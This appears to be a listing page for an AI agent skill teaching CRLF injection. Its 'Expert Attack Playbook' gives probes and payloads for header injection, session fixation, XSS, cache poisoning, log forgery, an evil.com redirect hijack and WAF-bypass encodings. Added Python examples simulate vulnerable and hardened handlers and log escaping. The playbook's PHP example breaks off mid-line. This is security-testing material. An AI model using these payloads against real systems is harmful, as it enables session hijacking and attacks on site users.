
Crlf Injection
Run a structured CRLF injection playbook when reflected user input can reach HTTP headers, redirects, Set-Cookie, or log lines.
Overview
CRLF Injection is an agent skill for the Ship phase that teaches HTTP response-splitting and header-injection techniques when user input is reflected in headers, redirects, cookies, or logs.
Install
npx skills add https://github.com/yaklang/hack-skills --skill crlf-injection
What is this skill?
- Core model: a CRLF (`%0D%0A`) in a reflected header value starts a new header line; a double CRLF ends the headers and injects a response body
- Detection probes and escalation paths to XSS, session fixation, and cache poisoning
- Encoding and filter-bypass patterns for the cases scanners miss
- Cross-routes to ghost-bits-cast-attack for Java targets when a WAF blocks the standard `\r\n` encodings
- Chains into cache poisoning and SMTP/mail-client CRLF classes on Java stacks
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 2/3 security scanners passed (skills.sh audits).
What problem does it solve?
You are shipping a web app or API and do not know whether reflected input can inject %0D%0A to add headers, poison caches, or escalate to XSS.
Who is it for?
Solo builders doing authorized security review on redirects, cookies, or header-reflecting endpoints before go-live.
Skip if: you only need dependency scanning or SAST with no manual HTTP header testing, or you do not have explicit permission to test the target system.
When should I use this skill?
User input reaches HTTP response headers, Location redirects, Set-Cookie values, or log files where CRLF can split or inject content.
What do I get? / Deliverables
After running the playbook you have concrete probes, bypass ideas, and chain notes (XSS, fixation, cache) to verify or rule out CRLF risk before release.
- Probe payloads
- Escalation chain notes
- Bypass encoding variants
How it compares
Use for CRLF-specific response splitting rather than generic OWASP cheat sheets or ad-hoc single-payload guesses.
Common Questions / FAQ
Who is crlf-injection for?
Indie developers and small teams who ship HTTP services and need a focused CRLF injection playbook during security review, often alongside other hack-skills in the same repo.
When should I use crlf-injection?
Use it in Ship when testing Location redirects, Set-Cookie reflection, custom response headers, or log injection; also when WAFs block normal %0D%0A and you need Java-specific byte-substitution routes documented in the skill.
Is crlf-injection safe to install?
It is documentation for offensive testing patterns—review the Security Audits panel on this Prism page and only run probes on systems you are authorized to test.
SKILL.md - Crlf Injection
# SKILL: CRLF Injection — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: CRLF injection (HTTP response splitting) techniques. Covers header injection, response body injection via double CRLF, XSS escalation, cache poisoning, and encoding bypass. Often overlooked by scanners but chains into XSS, session fixation, and cache attacks.

## 0. RELATED ROUTING

- [ghost-bits-cast-attack](../ghost-bits-cast-attack/SKILL.md) when the target is a **Java service** and `%0D%0A` / `\r\n` encodings are WAF-blocked — substituting `瘍` (U+760D, low byte `\r`) and `瘊` (U+760A, low byte `\n`) injects a real CRLF through Angus Mail / Jakarta Mail SMTP, Apache HttpClient headers, JDK HttpServer responses, and ActiveJ HTTP (re-enables Jira CVE-2025-57733 and JDK CVE-2026-21933 classes)

## 1. CORE CONCEPT

CRLF = `\r\n` (Carriage Return + Line Feed, `%0D%0A`). HTTP headers are separated by CRLF. If user input is reflected in a response header without sanitization, injecting CRLF characters creates new headers or even a response body. The server URL-decodes the parameter before reflecting it, so `%0D%0A` on the wire becomes a real line break inside the header block.

```
Normal:
Location: /page?url=USER_INPUT

Attack:
Location: /page?url=%0D%0ASet-Cookie:admin=true

Result: Two headers — Location + injected Set-Cookie
```

---

## 2. DETECTION

### Basic Probe

```text
%0D%0ANew-Header:injected

# In URL parameter:
https://target.com/redirect?url=%0D%0AX-Injected:true

# Check response headers for "X-Injected: true"
```

### Double CRLF — Body Injection

Two consecutive CRLF sequences end the headers and start the body:

```text
%0D%0A%0D%0A<script>alert(1)</script>

# Result:
HTTP/1.1 302 Found
Location: /page

<script>alert(1)</script>
```

Caveat: browsers do not render the body of a response they redirect on, so the injected script only fires when the Location value is empty or the redirect is otherwise neutralised (for example by injecting a complete second `HTTP/1.1 200 OK` response, as in the cache-poisoning payload below).

---

## 3. EXPLOITATION SCENARIOS

### Session Fixation via Set-Cookie

```text
%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id
```

### XSS via Response Body

```text
%0D%0A%0D%0A<html><script>alert(document.cookie)</script></html>
```

### Cache Poisoning

If the response is cached by a CDN or proxy, injected headers/body are served to all users. The injected `Content-Length: 0` ends the first response early, so the cache reads the attacker-supplied `HTTP/1.1 200 OK` that follows as the next response on the connection and stores it for whichever URL it was waiting on:

```text
GET /page?q=%0D%0AContent-Length:0%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:text/html%0D%0A%0D%0A<script>alert(1)</script>
```

### Log Injection

CRLF in log-visible fields (User-Agent, Referer) can forge log entries, because the logger writes the raw value and the line break starts what looks like a new record:

```text
User-Agent: normal%0D%0A127.0.0.1 - admin [date] "GET /admin" 200
```

---

## 4. FILTER BYPASS

| Filter | Bypass |
|---|---|
| Blocks `%0D%0A` | Try `%0D` alone, `%0A` alone, or `%E5%98%8A%E5%98%8D` (Unicode) |
| URL decodes once | Double-encode: `%250D%250A` |
| Strips `\r\n` literally | Use URL-encoded form |
| Blocks in value only | Inject in parameter name |

```text
# Unicode/UTF-8 bypass:
%E5%98%8A%E5%98%8D → decoded as CRLF in some parsers

# Double URL encoding:
%250D%250A → server decodes to %0D%0A → a second decode yields CRLF

# Partial injection (LF only):
%0A → some servers accept LF without CR
```

Why the Unicode variant works: `%E5%98%8A` is U+560A and `%E5%98%8D` is U+560D, whose low bytes are `0x0A` and `0x0D`. Only components that truncate each character to a single byte (the same effect the ghost-bits route exploits) see them as line terminators; a parser that keeps full code points sees two harmless CJK characters. Note that in the order written above the low bytes come out as LF then CR, so check which order the target actually honours.

---

## 5. REAL-WORLD EXPLOITATION CHAINS

### CRLF + Session Fixation

```text
# Inject Set-Cookie via CRLF in redirect parameter:
?url=%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id

# Result:
HTTP/1.1 302 Found
Location: /page
Set-Cookie: PHPSESSID=attacker_controlled_session_id

# Victim uses attacker's session → attacker hijacks after login
```

### CRLF → XSS via Double CRLF Body Injection

```text
# Two CRLF sequences end headers and inject response body:
?url=%0D%0A%0D%0A<script>alert(document.cookie)</script>

# Result:
HTTP/1.1 302 Found
Location: /page

<script>alert(document.cookie)</script>
```

### CRLF in 302 Location → Redirect Hijack

```text
# Inject a second Location header after the reflected one:
?url=%0D%0ALocation:http://evil.com%0D%0A%0D%0A

# Clients differ on which duplicate Location wins; those that use the LAST one redirect to evil.com
```

---

## 6. COMMON VULNERABLE PATTERNS

```php
// PHP — header() with us
```
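The core concept, the detection probes and the exploitation chains above all rest on the same mechanism, so here is one added example (written for this page, not code from the hack-skills repo) that simulates it end to end: a naive redirect handler that reflects a URL-decoded `?url=` parameter into `Location`, the hardened form that refuses control characters, and a client-side parser that tells you whether a probe split the headers, planted a body, or added a second `Location`. The handler names and the `X-Injected` marker are illustrative assumptions; the payloads are the playbook's own.

```python
from urllib.parse import unquote

CRLF = "\r\n"


def _build_302(location: str) -> bytes:
    """Serialise a minimal 302 exactly as a naive server does: the value is
    concatenated into the Location line with no check for control characters."""
    head = (
        "HTTP/1.1 302 Found" + CRLF
        + "Location: " + location + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )
    return head.encode("latin-1", errors="replace")


def vulnerable_redirect(url_param: str) -> bytes:
    """Hypothetical vulnerable handler: reflects the decoded parameter as-is."""
    return _build_302(unquote(url_param))


def hardened_redirect(url_param: str) -> bytes:
    """Same handler with the fix most frameworks apply: reject any decoded
    value containing CR, LF or NUL before it can reach a header line."""
    location = unquote(url_param)
    if set(location) & {"\r", "\n", "\x00"}:
        raise ValueError("control character in header value")
    return _build_302(location)


def parse_response(raw: bytes):
    """Split raw bytes the way an HTTP/1.1 client does: status line, then one
    header per CRLF-terminated line, headers ending at the first blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split(CRLF)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body.decode("latin-1")


def last_header(headers, name: str):
    """Value of the last occurrence of a header; clients that honour the last
    duplicate Location are what the redirect-hijack chain relies on."""
    values = [v for n, v in headers if n == name]
    return values[-1] if values else None


def probe(handler, payload: str, want_header: str = "x-injected",
          body_marker: str = "<script>") -> dict:
    """Run one probe through a handler and report what a client would observe."""
    try:
        raw = handler(payload)
    except ValueError:
        return {"blocked": True, "header_injected": False,
                "body_injected": False, "headers": []}
    status, headers, body = parse_response(raw)
    return {
        "blocked": False,
        "status": status,
        "headers": headers,
        "header_injected": any(n == want_header for n, _ in headers),
        "body_injected": body_marker in body,
    }


if __name__ == "__main__":
    # Probes from the playbook; only the server side is simulated here.
    for name, handler in (("vulnerable", vulnerable_redirect),
                          ("hardened", hardened_redirect)):
        print(name, "basic:", probe(handler, "%0D%0AX-Injected:true"))
        print(name, "body:", probe(handler, "%0D%0A%0D%0A<script>alert(1)</script>"))
        print(name, "fixation:", probe(
            handler, "/page%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id",
            want_header="set-cookie"))
        print(name, "hijack:", last_header(
            probe(handler, "%0D%0ALocation:http://evil.com")["headers"], "location"))
```

Against a live target, replace the handler with a function that sends the payload and returns the raw response bytes (not a high-level client, which will have already normalised duplicate headers), and keep the check against the parsed header list rather than a substring match on the whole response, so a reflection inside the body is not mistaken for a split.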
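The filter-bypass table only tells you which encoding to try; what decides whether a variant works is which decoding stages sit between the filter and the header writer. This added example (mine, not from the skill) models three hypothetical stacks as decode functions and reports, per payload, which line terminators reach the parser. The stack names and the `works_against` helper are assumptions for illustration; the payloads are the table's, plus the reversed CJK order and the U+760D/U+760A pair from the ghost-bits route.

```python
from urllib.parse import unquote


def decode_once(s: str) -> str:
    """One URL-decode, as a WAF or the first server layer performs it."""
    return unquote(s)


def decode_twice(s: str) -> str:
    """Two URL-decodes: the filter decodes once, the application decodes again."""
    return unquote(unquote(s))


def low_byte_cast(s: str) -> str:
    """Lossy char-to-byte cast (the 'ghost bits' effect): each code point is
    truncated to its low 8 bits, so U+560A -> 0x0A and U+760D -> 0x0D."""
    return "".join(chr(ord(c) & 0xFF) for c in s)


# Hypothetical decoding stacks a target might have (illustrative names).
STACKS = {
    "single-decode": decode_once,
    "double-decode": decode_twice,
    "single-decode+low-byte-cast": lambda s: low_byte_cast(decode_once(s)),
}


def terminators(s: str) -> set:
    """Line terminators an HTTP header parser would see in s."""
    found = set()
    if "\r\n" in s:
        found.add("CRLF")
    stripped = s.replace("\r\n", "")
    if "\n" in stripped:
        found.add("bare LF")
    if "\r" in stripped:
        found.add("bare CR")
    return found


def classify(payload: str) -> dict:
    """For each stack, the terminators the payload yields after decoding."""
    return {name: terminators(fn(payload)) for name, fn in STACKS.items()}


def works_against(payload: str, stack: str, lf_only_ok: bool = False) -> bool:
    """True if the payload yields a full CRLF on that stack, or a bare LF when
    the target is known to accept LF alone as a header separator."""
    seen = classify(payload)[stack]
    return "CRLF" in seen or (lf_only_ok and "bare LF" in seen)


PAYLOADS = [
    "%0D%0A",              # plain CRLF
    "%0A",                 # LF only
    "%250D%250A",          # double-encoded
    "%E5%98%8A%E5%98%8D",  # U+560A U+560D, the order given in the bypass table
    "%E5%98%8D%E5%98%8A",  # same two code points, CR first
    "%E7%98%8D%E7%98%8A",  # U+760D U+760A, the ghost-bits-cast pair
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(p, classify(p))
```

The run shows the points the table leaves implicit: `%250D%250A` is inert until a second decode happens, the CJK pair is inert on any stack that keeps full code points, and in the table's order it produces LF then CR rather than CRLF, so a target that only accepts `\r\n` needs the reversed order.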
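For the log-injection scenario, here is an added example (mine, not from the repo) showing why the forged entry works and what the fix looks like: a naive access-log formatter built by string interpolation, the same formatter with every attacker-influenced field escaped, a parser that reads records the way a log analyser would, and an ingest-time check that flags fields carrying CR/LF. The request record, its timestamp and the forged `admin` entry in the User-Agent are constructed for this example.

```python
import re

# Constructed sample request; the User-Agent carries the playbook's forged entry,
# closing the quoted field first so the forged line parses cleanly.
FORGED_UA = (
    'normal"\r\n'
    '127.0.0.1 - admin [10/Jan/2026:10:00:00 +0000] "GET /admin HTTP/1.1" 200 "forged'
)
SAMPLE = {
    "ip": "203.0.113.5",
    "user": "-",
    "date": "10/Jan/2026:10:00:00 +0000",
    "request": "GET /redirect?url=/page HTTP/1.1",
    "status": 200,
    "ua": FORGED_UA,
}


def format_naive(r: dict) -> str:
    """Hypothetical vulnerable logger: raw fields interpolated, CR/LF survives."""
    return f'{r["ip"]} - {r["user"]} [{r["date"]}] "{r["request"]}" {r["status"]} "{r["ua"]}"\n'


def escape_field(value: str) -> str:
    """Backslash-escape the characters that could break or forge a record."""
    return (value.replace("\\", "\\\\").replace('"', '\\"')
                 .replace("\r", "\\r").replace("\n", "\\n"))


def format_safe(r: dict) -> str:
    """Same layout, every field escaped before it is written."""
    f = {k: escape_field(str(v)) for k, v in r.items()}
    return f'{f["ip"]} - {f["user"]} [{f["date"]}] "{f["request"]}" {f["status"]} "{f["ua"]}"\n'


# One combined-log-style record per physical line; quoted fields may contain
# backslash escapes.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) - (?P<user>\S+) \[(?P<date>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) "(?P<ua>(?:[^"\\]|\\.)*)"$'
)


def parse_log(text: str) -> list:
    """Parse records the way a log analyser would: one line, one record."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out.append(m.groupdict())
    return out


def suspicious_fields(r: dict) -> list:
    """Ingest-time check: which string fields carry CR or LF before logging."""
    return [k for k, v in r.items()
            if isinstance(v, str) and ("\r" in v or "\n" in v)]


if __name__ == "__main__":
    print("naive:", parse_log(format_naive(SAMPLE)))
    print("safe: ", parse_log(format_safe(SAMPLE)))
    print("flagged before write:", suspicious_fields(SAMPLE))
```

The naive formatter turns one request into two parsed records, the second of which reads as a legitimate `GET /admin` by `admin` from 127.0.0.1; the escaping formatter keeps it as one record with the `\r\n` visible as evidence, which is also what lets a detection rule on the stored logs find the attempt afterwards.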